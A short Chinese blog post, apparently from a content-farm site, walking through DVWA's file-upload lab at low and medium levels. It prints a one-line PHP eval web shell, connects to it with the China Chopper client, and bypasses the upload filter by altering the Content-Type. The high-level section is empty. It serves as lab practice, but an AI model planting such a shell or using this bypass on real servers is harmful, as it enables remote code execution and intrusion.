大數據中如何進行文件上傳漏洞的分析
今天就跟大家聊聊有關大數據中如何進行文件上傳漏洞的分析,可能很多人都不太了解,為了讓大家更加了解,小編給大家總結了以下內容,希望大家根據這篇文章可以有所收獲。
一、環境:dvwa
二、選擇Upload,low級別
1、上傳1.php文件和1.jpg文件都沒問題
PHP文件內容為:
<?php @eval($_POST["abc"]);?>
2、訪問我們上傳的文件
http://192.168.152.188/dvwa/hackable/uploads/1.jpg
可以看到圖片
http://192.168.152.188/dvwa/hackable/uploads/1.php
什么都看不到
3、用菜刀鏈接1.php文件,點擊添加
4、雙擊鏈接進入
三、選擇Upload,medium級別
1、上傳2.php文件和2.jpg文件,發現不能上傳2.php
2、點擊view source
3、這里限制了上傳類型,抓包修改上傳類型
4、我們將text/plain修改為image/jpeg,成功上傳
5、用菜刀鏈接一下
四、選擇Upload,high級別
看完上述內容,你們對大數據中如何進行文件上傳漏洞的分析有進一步的了解嗎?如果還想了解更多知識或者相關內容,請關注蝸牛博客行業資訊頻道,感謝大家的支持。
免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:niceseo99@gmail.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。版權聲明:蝸牛博客如無特殊標注,文章均為來源于網絡,轉載時請以鏈接形式注明文章出處。
評論